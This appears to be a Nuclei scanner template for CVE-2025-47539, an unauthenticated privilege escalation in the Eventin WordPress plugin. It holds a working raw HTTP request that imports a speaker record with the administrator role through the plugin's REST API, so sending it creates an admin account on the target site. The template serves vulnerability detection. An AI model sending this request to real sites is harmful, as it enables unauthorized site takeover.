id: CVE-2025-47539

info:
  name: Eventin <= 4.0.26 - Privilege Escalation
  author: pdresearch
  severity: critical
  description: |
    The Eventin WordPress plugin before 4.0.27 suffers from an unauthenticated privilege escalation vulnerability. Due to a missing permission check in the a REST API endpoint, unauthenticated attackers can import users with arbitrary roles, including administrator, leading to full site compromise.
  impact: |
    Unauthenticated attackers can import users with arbitrary roles including administrator through a missing permission check in the REST API, leading to full site compromise.
  remediation: |
    Upgrade Eventin WordPress plugin to version 4.0.27 or later that implements proper permission checks on user import endpoints.
  reference:
    - https://patchstack.com/database/vulnerability/eventin/wordpress-eventin-plugin-4-0-26-unauthenticated-privilege-escalation-vulnerability
    - https://themewinter.com/eventin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47539
  classification:
    epss-score: 0.27898
    epss-percentile: 0.96555
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47539
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: themewinter
    product: eventin
    fofa-query: body="/wp-content/plugins/eventin"
  tags: cve,cve2025,wordpress,wp,wp-plugin,eventin,vkev,vuln

variables:
  name: "{{randbase(5)}}"
  oast: "oast.fun"

http:
  - raw:
      - |
        POST /wp-json/eventin/v2/speakers/import?_locale=user HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5Gx6VCxm3HMV2A9

        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9
        Content-Disposition: form-data; name="speaker_import"; filename="speakers.json"
        Content-Type: application/json

        [
          {
            "id": "999",
            "name": "{{name}}",
            "email": "{{name}}@{{oast}}",
            "image": "",
            "designation": "test",
            "summary": "",
            "social": [
              []
            ],
            "company_logo": "",
            "company_url": "",
            "speaker_group": "",
            "speaker_category": [
              "speaker"
            ],
            "company_name": "",
            "author_url": "",
            "role": "administrator"
          }
        ]
        ------WebKitFormBoundaryS5Gx6VCxm3HMV2A9--

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Successfully imported speaker")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Email: " + name + "@" + oast'  # the variable to extract
# digest: 4b0a00483046022100e7e2b90a1aa49f18795cbbbf0af7864dc4c41ff1fe06c30b38983053686ac482022100ad5d9d4da5626d776e217f77c8225e7d972e0b11047d27c2d5d9a9d49b62755e:922c64590222798bb761d5b6d8e72950